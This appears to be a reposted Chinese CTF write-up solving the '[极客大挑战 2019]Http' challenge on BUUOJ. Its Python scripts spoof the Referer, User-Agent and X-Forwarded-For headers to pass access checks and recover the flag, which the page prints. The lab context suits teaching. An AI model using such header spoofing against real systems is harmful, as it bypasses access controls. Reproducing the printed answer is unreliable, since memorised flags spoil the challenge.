zoukankan      html  css  js  c++  java

  • [极客大挑战 2019]Http

    首先查看源码,发现了Scret.php在这里插入图片描述
    访问一下:在这里插入图片描述
    说我们不是从https://www.Sycsecret.com访问的,那就使用python修改请求头:

    import requests
url = 'http://node3.buuoj.cn:25765/Secret.php'
headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}
r = requests.get(url,headers=headers)
with open("1.html",'w')as f:
    f.write(r.text)

    运行一下,python自动将html代码写入到1.html中,打开1.html:在这里插入图片描述

    这里提示我们需要使用”Syclover”浏览器,这里直接修改UA头即可,加一句headers['User-Agent'] = "Syclover"

    import requests
url = 'http://node3.buuoj.cn:25765/Secret.php'
headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}
headers['User-Agent'] = "Syclover"
r = requests.get(url,headers=headers)
with open("1.html",'w')as f:
    f.write(r.text)

    在这里插入图片描述
    locally,那就是需要本地访问,即用XFF头进行伪造,加一句headers['X-Forwarded-For'] = '127.0.0.1'

    import requests
url = 'http://node3.buuoj.cn:25765/Secret.php'
headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}
headers['User-Agent'] = "Syclover"
headers['X-Forwarded-For'] = '127.0.0.1'
r = requests.get(url,headers=headers)
with open("1.html",'w')as f:
    f.write(r.text)

    在这里插入图片描述

    flag{dea4ceac-5077-4d04-b0e3-7a7cf17ed028}

    不会用python用BP也可以做,附上大佬博客:
    https://www.cnblogs.com/wangtanzhi/p/12236844.html
  • 相关阅读:
    常用的npm指令总结
    Mongoose基础
    2016总结与展望
    sleep与wait的区别
    查询平均分大于80分的学生
    求最大不重复子串
    快速排序
    按位与(&)运算的作用
    异或运算的作用
    java 字符串中的每个单词的倒序输出
  • 原文地址:https://www.cnblogs.com/shenjuxian/p/13702748.html
Copyright © 2011-2022 走看看